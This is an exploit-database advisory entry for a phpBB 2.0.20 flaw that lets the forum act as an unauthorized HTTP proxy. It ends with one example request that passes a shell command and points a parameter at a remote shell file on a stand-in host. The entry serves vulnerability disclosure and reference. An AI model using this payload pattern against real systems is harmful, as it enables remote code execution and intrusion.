PHPBB 2.0.20 Unauthorized HTTP Proxy Vulnerability

2006-05-12T00:00:00
ID EDB-ID:27863
Type exploitdb
Reporter rgod
Modified 2006-05-12T00:00:00

Description

PHPBB 2.0.20 Unauthorized HTTP Proxy Vulnerability. CVE-2006-4450. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/17965/info

phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy.

An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy.

http://www.example.com/somescript.php?cmd=ls%20-la&xpl=http://www.example2.com/someshell.txt